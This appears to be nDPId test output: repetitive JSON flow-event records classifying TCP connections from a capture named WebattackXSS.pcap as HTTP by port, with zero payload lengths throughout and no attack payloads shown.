-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348047547,"flow_last_seen":1499348052913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348050079,"flow_last_seen":1499348055913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348051362,"flow_last_seen":1499348056913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348052641,"flow_last_seen":1499348057914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348055228,"flow_last_seen":1499348060913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348056534,"flow_last_seen":1499348061914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348057789,"flow_last_seen":1499348062914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348059068,"flow_last_seen":1499348064914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348060393,"flow_last_seen":1499348065915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348061684,"flow_last_seen":1499348066915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 